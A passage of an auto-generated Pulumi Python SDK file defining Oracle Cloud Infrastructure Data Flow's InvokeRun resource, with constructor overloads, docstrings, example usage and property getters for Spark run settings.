asynchronous: Optional[pulumi.Input[bool]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input[Mapping[str, Any]]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
driver_shape: Optional[pulumi.Input[str]] = None,
execute: Optional[pulumi.Input[str]] = None,
executor_shape: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
logs_bucket_uri: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
num_executors: Optional[pulumi.Input[int]] = None,
parameters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InvokeRunParameterArgs']]]]] = None,
spark_version: Optional[pulumi.Input[str]] = None,
warehouse_bucket_uri: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource provides the Invoke Run resource in Oracle Cloud Infrastructure Data Flow service.
Creates a run for an application.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_invoke_run = oci.dataflow.InvokeRun("testInvokeRun",
compartment_id=var["compartment_id"],
application_id=oci_dataflow_application["test_application"]["id"],
archive_uri=var["invoke_run_archive_uri"],
arguments=var["invoke_run_arguments"],
configuration=var["invoke_run_configuration"],
defined_tags={
"Operations.CostCenter": "42",
},
display_name=var["invoke_run_display_name"],
driver_shape=var["invoke_run_driver_shape"],
execute=var["invoke_run_execute"],
executor_shape=var["invoke_run_executor_shape"],
freeform_tags={
"Department": "Finance",
},
logs_bucket_uri=var["invoke_run_logs_bucket_uri"],
metastore_id=var["metastore_id"],
num_executors=var["invoke_run_num_executors"],
parameters=[oci.dataflow.InvokeRunParameterArgs(
name=var["invoke_run_parameters_name"],
value=var["invoke_run_parameters_value"],
)],
spark_version=var["invoke_run_spark_version"],
warehouse_bucket_uri=var["invoke_run_warehouse_bucket_uri"])
```
## Note
At a time service allows only one run to succeed if user is trying to invoke runs on multiple applications which have Private Endpoints and service will proceed invoking only one run and put the rest of them in failed state.
## Import
InvokeRuns can be imported using the `id`, e.g.
```sh
$ pulumi import oci:dataflow/invokeRun:InvokeRun test_invoke_run "id"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] application_id: The OCID of the associated application. If this value is set, then no value for the execute parameter is required. If this value is not set, then a value for the execute parameter is required, and a new application is created and associated with the new run.
:param pulumi.Input[str] archive_uri: An Oracle Cloud Infrastructure URI of an archive.zip file containing custom dependencies that may be used to support the execution a Python, Java, or Scala application. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[Sequence[pulumi.Input[str]]] arguments: The arguments passed to the running application as command line arguments. An argument is either a plain text or a placeholder. Placeholders are replaced using values from the parameters map. Each placeholder specified must be represented in the parameters map else the request (POST or PUT) will fail with a HTTP 400 status code. Placeholders are specified as `Service Api Spec`, where `name` is the name of the parameter. Example: `[ "--input", "${input_file}", "--name", "John Doe" ]` If "input_file" has a value of "mydata.xml", then the value above will be translated to `--input mydata.xml --name "John Doe"`
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of a compartment.
:param pulumi.Input[Mapping[str, Any]] configuration: The Spark configuration passed to the running process. See https://spark.apache.org/docs/latest/configuration.html#available-properties Example: { "spark.app.name" : "My App Name", "spark.shuffle.io.maxRetries" : "4" } Note: Not all Spark properties are permitted to be set. Attempting to set a property that is not allowed to be overwritten will cause a 400 status to be returned.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[str] display_name: A user-friendly name that does not have to be unique. Avoid entering confidential information. If this value is not specified, it will be derived from the associated application's displayName or set by API using fileUri's application file name.
:param pulumi.Input[str] driver_shape: The VM shape for the driver. Sets the driver cores and memory.
:param pulumi.Input[str] execute: The input used for spark-submit command. For more details see https://spark.apache.org/docs/latest/submitting-applications.html#launching-applications-with-spark-submit. Supported options include ``--class``, ``--file``, ``--jars``, ``--conf``, ``--py-files``, and main application file with arguments. Example: ``--jars oci://path/to/a.jar,oci://path/to/b.jar --files oci://path/to/a.json,oci://path/to/b.csv --py-files oci://path/to/a.py,oci://path/to/b.py --conf spark.sql.crossJoin.enabled=true --class org.apache.spark.examples.SparkPi oci://path/to/main.jar 10`` Note: If execute is specified together with applicationId, className, configuration, fileUri, language, arguments, parameters during application create/update, or run create/submit, Data Flow service will use derived information from execute input only.
:param pulumi.Input[str] executor_shape: The VM shape for the executors. Sets the executor cores and memory.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] logs_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket where the Spark job logs are to be uploaded. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[str] metastore_id: The OCID of Oracle Cloud Infrastructure Hive Metastore.
:param pulumi.Input[int] num_executors: The number of executor VMs requested.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InvokeRunParameterArgs']]]] parameters: An array of name/value pairs used to fill placeholders found in properties like `Application.arguments`. The name must be a string of one or more word characters (a-z, A-Z, 0-9, _). The value can be a string of 0 or more characters of any kind. Example: [ { name: "iterations", value: "10"}, { name: "input_file", value: "mydata.xml" }, { name: "variable_x", value: "${x}"} ]
:param pulumi.Input[str] spark_version: The Spark version utilized to run the application. This value may be set if applicationId is not since the Spark version will be taken from the associated application.
:param pulumi.Input[str] warehouse_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket to be used as default warehouse directory for BATCH SQL runs. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: InvokeRunArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Invoke Run resource in Oracle Cloud Infrastructure Data Flow service.
Creates a run for an application.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_invoke_run = oci.dataflow.InvokeRun("testInvokeRun",
compartment_id=var["compartment_id"],
application_id=oci_dataflow_application["test_application"]["id"],
archive_uri=var["invoke_run_archive_uri"],
arguments=var["invoke_run_arguments"],
configuration=var["invoke_run_configuration"],
defined_tags={
"Operations.CostCenter": "42",
},
display_name=var["invoke_run_display_name"],
driver_shape=var["invoke_run_driver_shape"],
execute=var["invoke_run_execute"],
executor_shape=var["invoke_run_executor_shape"],
freeform_tags={
"Department": "Finance",
},
logs_bucket_uri=var["invoke_run_logs_bucket_uri"],
metastore_id=var["metastore_id"],
num_executors=var["invoke_run_num_executors"],
parameters=[oci.dataflow.InvokeRunParameterArgs(
name=var["invoke_run_parameters_name"],
value=var["invoke_run_parameters_value"],
)],
spark_version=var["invoke_run_spark_version"],
warehouse_bucket_uri=var["invoke_run_warehouse_bucket_uri"])
```
## Note
At a time service allows only one run to succeed if user is trying to invoke runs on multiple applications which have Private Endpoints and service will proceed invoking only one run and put the rest of them in failed state.
## Import
InvokeRuns can be imported using the `id`, e.g.
```sh
$ pulumi import oci:dataflow/invokeRun:InvokeRun test_invoke_run "id"
```
:param str resource_name: The name of the resource.
:param InvokeRunArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(InvokeRunArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
application_id: Optional[pulumi.Input[str]] = None,
archive_uri: Optional[pulumi.Input[str]] = None,
arguments: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
asynchronous: Optional[pulumi.Input[bool]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input[Mapping[str, Any]]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
driver_shape: Optional[pulumi.Input[str]] = None,
execute: Optional[pulumi.Input[str]] = None,
executor_shape: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
logs_bucket_uri: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
num_executors: Optional[pulumi.Input[int]] = None,
parameters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InvokeRunParameterArgs']]]]] = None,
spark_version: Optional[pulumi.Input[str]] = None,
warehouse_bucket_uri: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = InvokeRunArgs.__new__(InvokeRunArgs)
__props__.__dict__["application_id"] = application_id
__props__.__dict__["archive_uri"] = archive_uri
__props__.__dict__["arguments"] = arguments
__props__.__dict__["asynchronous"] = asynchronous
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["configuration"] = configuration
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["display_name"] = display_name
__props__.__dict__["driver_shape"] = driver_shape
__props__.__dict__["execute"] = execute
__props__.__dict__["executor_shape"] = executor_shape
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["logs_bucket_uri"] = logs_bucket_uri
__props__.__dict__["metastore_id"] = metastore_id
__props__.__dict__["num_executors"] = num_executors
__props__.__dict__["parameters"] = parameters
__props__.__dict__["spark_version"] = spark_version
__props__.__dict__["warehouse_bucket_uri"] = warehouse_bucket_uri
__props__.__dict__["class_name"] = None
__props__.__dict__["data_read_in_bytes"] = None
__props__.__dict__["data_written_in_bytes"] = None
__props__.__dict__["file_uri"] = None
__props__.__dict__["language"] = None
__props__.__dict__["lifecycle_details"] = None
__props__.__dict__["opc_request_id"] = None
__props__.__dict__["owner_principal_id"] = None
__props__.__dict__["owner_user_name"] = None
__props__.__dict__["private_endpoint_dns_zones"] = None
__props__.__dict__["private_endpoint_id"] = None
__props__.__dict__["private_endpoint_max_host_count"] = None
__props__.__dict__["private_endpoint_nsg_ids"] = None
__props__.__dict__["private_endpoint_subnet_id"] = None
__props__.__dict__["run_duration_in_milliseconds"] = None
__props__.__dict__["state"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["time_updated"] = None
__props__.__dict__["total_ocpu"] = None
super(InvokeRun, __self__).__init__(
'oci:dataflow/invokeRun:InvokeRun',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
application_id: Optional[pulumi.Input[str]] = None,
archive_uri: Optional[pulumi.Input[str]] = None,
arguments: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
asynchronous: Optional[pulumi.Input[bool]] = None,
class_name: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input[Mapping[str, Any]]] = None,
data_read_in_bytes: Optional[pulumi.Input[str]] = None,
data_written_in_bytes: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
driver_shape: Optional[pulumi.Input[str]] = None,
execute: Optional[pulumi.Input[str]] = None,
executor_shape: Optional[pulumi.Input[str]] = None,
file_uri: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
language: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
logs_bucket_uri: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
num_executors: Optional[pulumi.Input[int]] = None,
opc_request_id: Optional[pulumi.Input[str]] = None,
owner_principal_id: Optional[pulumi.Input[str]] = None,
owner_user_name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InvokeRunParameterArgs']]]]] = None,
private_endpoint_dns_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
private_endpoint_id: Optional[pulumi.Input[str]] = None,
private_endpoint_max_host_count: Optional[pulumi.Input[int]] = None,
private_endpoint_nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
private_endpoint_subnet_id: Optional[pulumi.Input[str]] = None,
run_duration_in_milliseconds: Optional[pulumi.Input[str]] = None,
spark_version: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None,
total_ocpu: Optional[pulumi.Input[int]] = None,
warehouse_bucket_uri: Optional[pulumi.Input[str]] = None) -> 'InvokeRun':
"""
Get an existing InvokeRun resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] application_id: The OCID of the associated application. If this value is set, then no value for the execute parameter is required. If this value is not set, then a value for the execute parameter is required, and a new application is created and associated with the new run.
:param pulumi.Input[str] archive_uri: An Oracle Cloud Infrastructure URI of an archive.zip file containing custom dependencies that may be used to support the execution a Python, Java, or Scala application. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[Sequence[pulumi.Input[str]]] arguments: The arguments passed to the running application as command line arguments. An argument is either a plain text or a placeholder. Placeholders are replaced using values from the parameters map. Each placeholder specified must be represented in the parameters map else the request (POST or PUT) will fail with a HTTP 400 status code. Placeholders are specified as `Service Api Spec`, where `name` is the name of the parameter. Example: `[ "--input", "${input_file}", "--name", "John Doe" ]` If "input_file" has a value of "mydata.xml", then the value above will be translated to `--input mydata.xml --name "John Doe"`
:param pulumi.Input[str] class_name: The class for the application.
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of a compartment.
:param pulumi.Input[Mapping[str, Any]] configuration: The Spark configuration passed to the running process. See https://spark.apache.org/docs/latest/configuration.html#available-properties Example: { "spark.app.name" : "My App Name", "spark.shuffle.io.maxRetries" : "4" } Note: Not all Spark properties are permitted to be set. Attempting to set a property that is not allowed to be overwritten will cause a 400 status to be returned.
:param pulumi.Input[str] data_read_in_bytes: The data read by the run in bytes.
:param pulumi.Input[str] data_written_in_bytes: The data written by the run in bytes.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[str] display_name: A user-friendly name that does not have to be unique. Avoid entering confidential information. If this value is not specified, it will be derived from the associated application's displayName or set by API using fileUri's application file name.
:param pulumi.Input[str] driver_shape: The VM shape for the driver. Sets the driver cores and memory.
:param pulumi.Input[str] execute: The input used for spark-submit command. For more details see https://spark.apache.org/docs/latest/submitting-applications.html#launching-applications-with-spark-submit. Supported options include ``--class``, ``--file``, ``--jars``, ``--conf``, ``--py-files``, and main application file with arguments. Example: ``--jars oci://path/to/a.jar,oci://path/to/b.jar --files oci://path/to/a.json,oci://path/to/b.csv --py-files oci://path/to/a.py,oci://path/to/b.py --conf spark.sql.crossJoin.enabled=true --class org.apache.spark.examples.SparkPi oci://path/to/main.jar 10`` Note: If execute is specified together with applicationId, className, configuration, fileUri, language, arguments, parameters during application create/update, or run create/submit, Data Flow service will use derived information from execute input only.
:param pulumi.Input[str] executor_shape: The VM shape for the executors. Sets the executor cores and memory.
:param pulumi.Input[str] file_uri: An Oracle Cloud Infrastructure URI of the file containing the application to execute. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] language: The Spark language.
:param pulumi.Input[str] lifecycle_details: The detailed messages about the lifecycle state.
:param pulumi.Input[str] logs_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket where the Spark job logs are to be uploaded. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[str] metastore_id: The OCID of Oracle Cloud Infrastructure Hive Metastore.
:param pulumi.Input[int] num_executors: The number of executor VMs requested.
:param pulumi.Input[str] opc_request_id: Unique Oracle assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param pulumi.Input[str] owner_principal_id: The OCID of the user who created the resource.
:param pulumi.Input[str] owner_user_name: The username of the user who created the resource. If the username of the owner does not exist, `null` will be returned and the caller should refer to the ownerPrincipalId value instead.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InvokeRunParameterArgs']]]] parameters: An array of name/value pairs used to fill placeholders found in properties like `Application.arguments`. The name must be a string of one or more word characters (a-z, A-Z, 0-9, _). The value can be a string of 0 or more characters of any kind. Example: [ { name: "iterations", value: "10"}, { name: "input_file", value: "mydata.xml" }, { name: "variable_x", value: "${x}"} ]
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_endpoint_dns_zones: An array of DNS zone names. Example: `[ "app.examplecorp.com", "app.examplecorp2.com" ]`
:param pulumi.Input[str] private_endpoint_id: The OCID of a private endpoint.
:param pulumi.Input[int] private_endpoint_max_host_count: The maximum number of hosts to be accessed through the private endpoint. This value is used to calculate the relevant CIDR block and should be a multiple of 256. If the value is not a multiple of 256, it is rounded up to the next multiple of 256. For example, 300 is rounded up to 512.
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_endpoint_nsg_ids: An array of network security group OCIDs.
:param pulumi.Input[str] private_endpoint_subnet_id: The OCID of a subnet.
:param pulumi.Input[str] run_duration_in_milliseconds: The duration of the run in milliseconds.
:param pulumi.Input[str] spark_version: The Spark version utilized to run the application. This value may be set if applicationId is not since the Spark version will be taken from the associated application.
:param pulumi.Input[str] state: The current state of this run.
:param pulumi.Input[str] time_created: The date and time a application was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
:param pulumi.Input[str] time_updated: The date and time a application was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
:param pulumi.Input[int] total_ocpu: The total number of oCPU requested by the run.
:param pulumi.Input[str] warehouse_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket to be used as default warehouse directory for BATCH SQL runs. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _InvokeRunState.__new__(_InvokeRunState)
__props__.__dict__["application_id"] = application_id
__props__.__dict__["archive_uri"] = archive_uri
__props__.__dict__["arguments"] = arguments
__props__.__dict__["asynchronous"] = asynchronous
__props__.__dict__["class_name"] = class_name
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["configuration"] = configuration
__props__.__dict__["data_read_in_bytes"] = data_read_in_bytes
__props__.__dict__["data_written_in_bytes"] = data_written_in_bytes
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["display_name"] = display_name
__props__.__dict__["driver_shape"] = driver_shape
__props__.__dict__["execute"] = execute
__props__.__dict__["executor_shape"] = executor_shape
__props__.__dict__["file_uri"] = file_uri
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["language"] = language
__props__.__dict__["lifecycle_details"] = lifecycle_details
__props__.__dict__["logs_bucket_uri"] = logs_bucket_uri
__props__.__dict__["metastore_id"] = metastore_id
__props__.__dict__["num_executors"] = num_executors
__props__.__dict__["opc_request_id"] = opc_request_id
__props__.__dict__["owner_principal_id"] = owner_principal_id
__props__.__dict__["owner_user_name"] = owner_user_name
__props__.__dict__["parameters"] = parameters
__props__.__dict__["private_endpoint_dns_zones"] = private_endpoint_dns_zones
__props__.__dict__["private_endpoint_id"] = private_endpoint_id
__props__.__dict__["private_endpoint_max_host_count"] = private_endpoint_max_host_count
__props__.__dict__["private_endpoint_nsg_ids"] = private_endpoint_nsg_ids
__props__.__dict__["private_endpoint_subnet_id"] = private_endpoint_subnet_id
__props__.__dict__["run_duration_in_milliseconds"] = run_duration_in_milliseconds
__props__.__dict__["spark_version"] = spark_version
__props__.__dict__["state"] = state
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_updated"] = time_updated
__props__.__dict__["total_ocpu"] = total_ocpu
__props__.__dict__["warehouse_bucket_uri"] = warehouse_bucket_uri
return InvokeRun(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> pulumi.Output[str]:
"""
The OCID of the associated application. If this value is set, then no value for the execute parameter is required. If this value is not set, then a value for the execute parameter is required, and a new application is created and associated with the new run.
"""
return pulumi.get(self, "application_id")
@property
@pulumi.getter(name="archiveUri")
def archive_uri(self) -> pulumi.Output[str]:
"""
An Oracle Cloud Infrastructure URI of an archive.zip file containing custom dependencies that may be used to support the execution a Python, Java, or Scala application. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "archive_uri")
@property
@pulumi.getter
def arguments(self) -> pulumi.Output[Sequence[str]]:
"""
The arguments passed to the running application as command line arguments. An argument is either a plain text or a placeholder. Placeholders are replaced using values from the parameters map. Each placeholder specified must be represented in the parameters map else the request (POST or PUT) will fail with a HTTP 400 status code. Placeholders are specified as `Service Api Spec`, where `name` is the name of the parameter. Example: `[ "--input", "${input_file}", "--name", "John Doe" ]` If "input_file" has a value of "mydata.xml", then the value above will be translated to `--input mydata.xml --name "John Doe"`
"""
return pulumi.get(self, "arguments")
@property
@pulumi.getter
def asynchronous(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "asynchronous")
@property
@pulumi.getter(name="className")
def class_name(self) -> pulumi.Output[str]:
"""
The class for the application.
"""
return pulumi.get(self, "class_name")
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
(Updatable) The OCID of a compartment.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter
def configuration(self) -> pulumi.Output[Mapping[str, Any]]:
"""
The Spark configuration passed to the running process. See https://spark.apache.org/docs/latest/configuration.html#available-properties Example: { "spark.app.name" : "My App Name", "spark.shuffle.io.maxRetries" : "4" } Note: Not all Spark properties are permitted to be set. Attempting to set a property that is not allowed to be overwritten will cause a 400 status to be returned.
"""
return pulumi.get(self, "configuration")
@property
@pulumi.getter(name="dataReadInBytes")
def data_read_in_bytes(self) -> pulumi.Output[str]:
"""
The data read by the run in bytes.
"""
return pulumi.get(self, "data_read_in_bytes")
@property
@pulumi.getter(name="dataWrittenInBytes")
def data_written_in_bytes(self) -> pulumi.Output[str]:
"""
The data written by the run in bytes.
"""
return pulumi.get(self, "data_written_in_bytes")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
A user-friendly name that does not have to be unique. Avoid entering confidential information. If this value is not specified, it will be derived from the associated application's displayName or set by API using fileUri's application file name.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="driverShape")
def driver_shape(self) -> pulumi.Output[str]:
"""
The VM shape for the driver. Sets the driver cores and memory.
"""
return pulumi.get(self, "driver_shape")
@property
@pulumi.getter
def execute(self) -> pulumi.Output[str]:
"""
The input used for spark-submit command. For more details see https://spark.apache.org/docs/latest/submitting-applications.html#launching-applications-with-spark-submit. Supported options include ``--class``, ``--file``, ``--jars``, ``--conf``, ``--py-files``, and main application file with arguments. Example: ``--jars oci://path/to/a.jar,oci://path/to/b.jar --files oci://path/to/a.json,oci://path/to/b.csv --py-files oci://path/to/a.py,oci://path/to/b.py --conf spark.sql.crossJoin.enabled=true --class org.apache.spark.examples.SparkPi oci://path/to/main.jar 10`` Note: If execute is specified together with applicationId, className, configuration, fileUri, language, arguments, parameters during application create/update, or run create/submit, Data Flow service will use derived information from execute input only.
"""
return pulumi.get(self, "execute")
@property
@pulumi.getter(name="executorShape")
def executor_shape(self) -> pulumi.Output[str]:
"""
The VM shape for the executors. Sets the executor cores and memory.
"""
return pulumi.get(self, "executor_shape")
@property
@pulumi.getter(name="fileUri")
def file_uri(self) -> pulumi.Output[str]:
"""
An Oracle Cloud Infrastructure URI of the file containing the application to execute. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "file_uri")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter
def language(self) -> pulumi.Output[str]:
"""
The Spark language.
"""
return pulumi.get(self, "language")
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> pulumi.Output[str]:
"""
The detailed messages about the lifecycle state.
"""
return pulumi.get(self, "lifecycle_details")
@property
@pulumi.getter(name="logsBucketUri")
def logs_bucket_uri(self) -> pulumi.Output[str]:
"""
An Oracle Cloud Infrastructure URI of the bucket where the Spark job logs are to be uploaded. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "logs_bucket_uri")
@property
@pulumi.getter(name="metastoreId")
def metastore_id(self) -> pulumi.Output[str]:
"""
The OCID of Oracle Cloud Infrastructure Hive Metastore.
"""
return pulumi.get(self, "metastore_id")
@property
@pulumi.getter(name="numExecutors")
def num_executors(self) -> pulumi.Output[int]:
"""
The number of executor VMs requested.
"""
return pulumi.get(self, "num_executors")
@property
@pulumi.getter(name="opcRequestId")
def opc_request_id(self) -> pulumi.Output[str]:
"""
Unique Oracle assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
"""
return pulumi.get(self, "opc_request_id")
@property
@pulumi.getter(name="ownerPrincipalId")
def owner_principal_id(self) -> pulumi.Output[str]:
"""
The OCID of the user who created the resource.
"""
return pulumi.get(self, "owner_principal_id")
@property
@pulumi.getter(name="ownerUserName")
def owner_user_name(self) -> pulumi.Output[str]:
"""
The username of the user who created the resource. If the username of the owner does not exist, `null` will be returned and the caller should refer to the ownerPrincipalId value instead.
"""
return pulumi.get(self, "owner_user_name")
@property
@pulumi.getter
def parameters(self) -> pulumi.Output[Sequence['outputs.InvokeRunParameter']]:
"""
An array of name/value pairs used to fill placeholders found in properties like `Application.arguments`. The name must be a string of one or more word characters (a-z, A-Z, 0-9, _). The value can be a string of 0 or more characters of any kind. Example: [ { name: "iterations", value: "10"}, { name: "input_file", value: "mydata.xml" }, { name: "variable_x", value: "${x}"} ]
"""
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="privateEndpointDnsZones")
def private_endpoint_dns_zones(self) -> pulumi.Output[Sequence[str]]:
"""
An array of DNS zone names. Example: `[ "app.examplecorp.com", "app.examplecorp2.com" ]`
"""
return pulumi.get(self, "private_endpoint_dns_zones")
@property
@pulumi.getter(name="privateEndpointId")
def private_endpoint_id(self) -> pulumi.Output[str]:
"""
The OCID of a private endpoint.
"""
return pulumi.get(self, "private_endpoint_id")
@property
@pulumi.getter(name="privateEndpointMaxHostCount")
def private_endpoint_max_host_count(self) -> pulumi.Output[int]:
"""
The maximum number of hosts to be accessed through the private endpoint. This value is used to calculate the relevant CIDR block and should be a multiple of 256. If the value is not a multiple of 256, it is rounded up to the next multiple of 256. For example, 300 is rounded up to 512.
"""
return pulumi.get(self, "private_endpoint_max_host_count")
@property
@pulumi.getter(name="privateEndpointNsgIds")
def private_endpoint_nsg_ids(self) -> pulumi.Output[Sequence[str]]:
"""
An array of network security group OCIDs.
"""
return pulumi.get(self, "private_endpoint_nsg_ids")
@property
@pulumi.getter(name="privateEndpointSubnetId")
def private_endpoint_subnet_id(self) -> pulumi.Output[str]:
"""
The OCID of a subnet.
"""
return pulumi.get(self, "private_endpoint_subnet_id")
@property
@pulumi.getter(name="runDurationInMilliseconds")
def run_duration_in_milliseconds(self) -> pulumi.Output[str]:
"""
The duration of the run in milliseconds.
"""
return pulumi.get(self, "run_duration_in_milliseconds")
@property
